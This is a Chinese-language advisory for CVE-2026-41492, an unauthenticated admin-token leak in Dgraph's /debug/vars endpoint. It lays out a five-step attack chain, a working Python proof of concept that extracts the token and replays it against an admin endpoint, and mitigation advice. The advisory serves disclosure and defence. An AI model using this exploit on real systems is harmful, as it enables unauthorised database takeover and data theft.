CVE-2026-41492 Dgraph管理员令牌泄露漏洞

漏洞信息

漏洞编号

CVE-2026-41492

漏洞类型

敏感信息泄露

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Dgraph

漏洞概述

Dgraph在25.3.3之前的版本中存在严重漏洞。由于未认证的/debug/vars端点暴露了进程命令行，攻击者可从中提取通过启动参数传递的管理员令牌。利用该令牌，攻击者可绕过认证机制，访问管理员专用接口，执行任意操作，从而获取系统完全控制权，造成严重的数据泄露与破坏。

技术细节

该漏洞源于Go语言默认HTTP服务多路复用器的不当暴露。尽管此前修复了/debug/pprof/cmdline的泄露问题，但expvar注册的/debug/vars端点仍处于开放状态。攻击者向Alpha节点发送未认证请求至该端点，即可获取包含进程启动参数的调试信息。由于Dgraph管理员常通过--security "token=..."参数在启动时注入令牌，该敏感字符串会随命令行一并泄露。攻击者捕获令牌后，通过在请求头中添加X-Dgraph-AuthToken字段，即可成功伪造管理员身份，进而接管整个数据库服务，执行任意管理员指令，造成严重的数据泄露与破坏。

攻击链分析

STEP 1

信息收集

攻击者扫描目标Dgraph节点，发现开放的/debug/vars端点。

STEP 2

令牌窃取

攻击者向/debug/vars发送HTTP GET请求，获取包含进程启动命令行的JSON数据。

STEP 3

数据解析

攻击者解析返回的JSON数据，从命令行参数中提取--security标志后的管理员Token。

STEP 4

认证绕过

攻击者构造恶意请求，在HTTP头X-Dgraph-AuthToken中填入窃取的Token。

STEP 5

权限提升

利用窃取的Token访问受保护的管理员API接口，获取数据库的完全控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

target = "http://127.0.0.1:8080"

def exploit():
    print(f"[*] Targeting: {target}")

    # Step 1: Access the unauthenticated /debug/vars endpoint
    url_vars = f"{target}/debug/vars"
    try:
        resp = requests.get(url_vars, timeout=5)
        if resp.status_code != 200:
            print(f"[-] Failed to access /debug/vars: {resp.status_code}")
            return
    except Exception as e:
        print(f"[-] Connection error: {e}")
        return

    print("[+] Successfully retrieved /debug/vars")

    # Step 2: Parse the response to find the admin token
    # The token is passed via startup flag, e.g., --security "token=SECRET"
    try:
        data = resp.json()
        content_str = json.dumps(data)
        
        token = None
        search_pattern = "token="
        
        if search_pattern in content_str:
            parts = content_str.split(search_pattern)
            if len(parts) > 1:
                token = parts[1].split('"')[0].split(' ')[0]
                
        if token:
            print(f"[+] Admin Token extracted: {token}")
        else:
            print("[-] Admin token not found in response.")
            return

    except ValueError:
        print("[-] Failed to parse JSON response.")
        return

    # Step 3: Replay the token to gain admin access
    print("[*] Attempting to access admin endpoint with token...")
    admin_headers = {
        "X-Dgraph-AuthToken": token
    }
    
    # Example request to an admin-only endpoint
    url_admin = f"{target}/admin/backup"
    
    admin_resp = requests.get(url_admin, headers=admin_headers)
    
    if admin_resp.status_code == 200:
        print("[+] Success! Admin access granted.")
    else:
        print(f"[-] Failed to access admin endpoint. Status: {admin_resp.status_code}")

if __name__ == "__main__":
    exploit()

影响范围

Dgraph < 25.3.3

防御指南

临时缓解措施

建议立即升级至Dgraph 25.3.3或更高版本。在升级前，应通过网络防火墙或ACL策略，严格限制外部对/debug/vars端点的访问，仅允许内部受信任网络访问。同时，检查启动脚本，移除命令行中的明文Token配置。